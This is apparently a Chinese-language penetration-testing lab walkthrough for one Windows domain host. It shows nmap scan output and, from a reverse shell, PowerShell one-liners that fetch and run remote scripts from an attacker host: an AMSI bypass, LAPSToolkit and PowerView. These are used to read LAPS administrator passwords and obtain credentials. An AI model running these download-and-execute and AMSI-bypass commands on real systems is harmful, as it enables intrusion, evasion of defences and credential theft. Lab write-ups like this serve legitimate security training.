Nmap initial output

命令:nmap -A -Pn 192.168.243.122

Nmap scan report for 192.168.243.122
Host is up (0.21s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=client.infinity.com
| Not valid before: 2022-07-08T13:32:36
|_Not valid after:  2023-01-07T13:32:36
|_ssl-date: 2022-07-09T13:38:14+00:00; +1s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: INFINITY
|   NetBIOS_Domain_Name: INFINITY
|   NetBIOS_Computer_Name: CLIENT
**|   DNS_Domain_Name: infinity.com
|   DNS_Computer_Name: client.infinity.com
|   DNS_Tree_Name: infinity.com**
|   Product_Version: 10.0.18362
|_  System_Time: 2022-07-09T13:37:33+00:00
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP (92%), AVtech embedded (87%), FreeBSD 6.X|10.X (86%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:freebsd:freebsd:6.2 cpe:/o:freebsd:freebsd:10.3
Aggressive OS guesses: Microsoft Windows XP SP3 (92%), AVtech Room Alert 26W environmental monitor (87%), FreeBSD 6.2-RELEASE (86%), Microsoft Windows XP SP2 (85%), FreeBSD 10.3-STABLE (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
-   Hop 1 is the same as for 192.168.243.121
2   211.92 ms 192.168.243.122

Post-scan script results:
| clock-skew: 
|   0s: 
|     192.168.243.122
|     192.168.243.121
|_    192.168.243.120
OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 3 IP addresses (3 hosts up) scanned in 112.46 seconds

从192.168.243.121获取到192.168.243.122的反弹shell,紧跟121已经写下的部分:

上传LAPS利用工具LAPSToolkit:

PS C:\\Windows\\Tasks> IEX((New-Object System.Net.WebClient).DownloadString('[<http://192.168.49.243/LAPSToolkit.ps1>](<http://192.168.49.243/LAPSToolkit.ps1>)'))

操作步骤:

PS C:\\Windows\\Tasks> Find-LAPSDelegatedGroups

17.png

从扫描信息可以知道,这是一个域。上传PowerView 2.0,因为后续用到的某个函数来自PowerView 2.0。

先bypass AMSI:

PS C:\\Windows\\Tasks> IEX((New-Object System.Net.WebClient).DownloadString('[<http://192.168.49.243/amsi.txt>](<http://192.168.49.243/amsi.txt>)'))

然后,上传PowerView 2.0,并加载到内存:

PS C:\\Windows\\Tasks> IEX((New-Object System.Net.WebClient).DownloadString('[<http://192.168.49.243/Old_PowerView.ps1>](<http://192.168.49.243/Old_PowerView.ps1>)'))

18.png

PS C:\\Windows\\Tasks> Get-NetGroupMember -GroupName "PswReaders”

18.png

PS C:\\Windows\\Tasks> Get-LAPSComputers

17.png

得到web05的登录凭证,接下来的步骤参见192.168.243.121